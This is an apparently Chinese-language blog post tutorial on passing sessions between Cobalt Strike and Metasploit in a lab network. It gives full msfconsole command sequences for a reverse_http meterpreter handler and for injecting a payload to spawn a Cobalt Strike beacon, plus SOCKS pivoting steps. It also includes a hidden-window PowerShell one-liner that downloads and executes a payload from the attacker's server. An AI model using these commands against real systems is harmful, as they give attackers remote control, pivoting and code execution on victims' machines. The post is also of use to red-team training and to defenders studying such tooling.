CS与MSF联动

Posted by Tattoo on 2021-03-29
Estimated Reading Time 1 Minutes
Words 398 In Total
Viewed Times

CS与MSF联动

NAT模式

CS : 192.168.120.67

MSF : 192.168.120.68

victim : 192.168.120.71

CS to MSF

  1. 利用CS的beacon给MSF派生一个shell
  • MSF

按如下配置

1
2
3
4
5
6
7
8
9
10
11
12
13
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.120.68
lhost => 192.168.120.68
msf6 exploit(multi/handler) > set lport 5678
lport => 5678
msf6 exploit(multi/handler) > set ExitOnSession False
ExitOnSession => false
msf6 exploit(multi/handler) > exploit

[*] Started HTTP reverse handler on http://192.168.120.68:5678
  • CS

建立一个foreign http(s)监听器,host和port与MSF中配置一样

右键beacon,选择刚才建立的监听器

此时,MSF获得了一个shell

  1. 利用CS为MSF提供转发或代理功能

右击beacon->pivoting->SOCKS Server,配置端口

view->proxy pivots可获取刚建立的转发器,点击tunnel获取msf的转发命令

复制到MSF中,接下来就可以进行后续的探测和漏洞利用

MSF to CS

  1. 利用meterpreter会话派生一个beacon到CS
  • MSF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
use exploit/windows/local/payload_inject

//CS_Listener
set payload windows/meterpreter/reverse_http

//CS_IP
set lhost 192.168.120.67

//CS_PORT
set lport 1234

//meterpreter session_ID
set session 1

//设置MSF不启动监听(不然的话msf会提示执行成功,但没有会话建立,同时CS也不会接收到会话)
set disablepayloadhandler true

exploit

CS再次上线一个beacon,及时迁移进程,防止断开失效

  1. 获取一个命令执行shell
  • CS

Attacks -> Web Drive-by -> Scripted Web Delivery(S)

配置监听器和URL路径,启动后会弹出相应的命令提示

1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.120.67:80/login.php'))"

将命令复制到meterpreter会话中执行即可


If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !